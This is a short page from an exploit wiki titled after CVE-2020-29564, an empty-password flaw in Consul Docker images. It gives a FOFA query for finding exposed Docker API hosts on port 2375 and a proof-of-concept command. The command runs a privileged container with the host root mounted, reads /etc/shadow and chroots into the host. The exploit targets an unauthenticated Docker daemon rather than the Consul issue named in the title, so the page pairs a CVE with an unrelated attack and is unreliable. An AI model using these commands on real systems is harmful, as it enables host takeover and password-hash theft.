Loading
0

CVE-2020-29564 Consul Docker images 空密码登录漏洞

免费、自由、人人可编辑的漏洞库--PwnWiki.com

,

FOFA

port="2375" && protocol=="docker"

POC

docker -H <host>:2375 run --rm -it --privileged --net=host -v /:/mnt alpine

File Access: cat /mnt/etc/shadow
RCE: chroot /mnt

PWNWIK.COM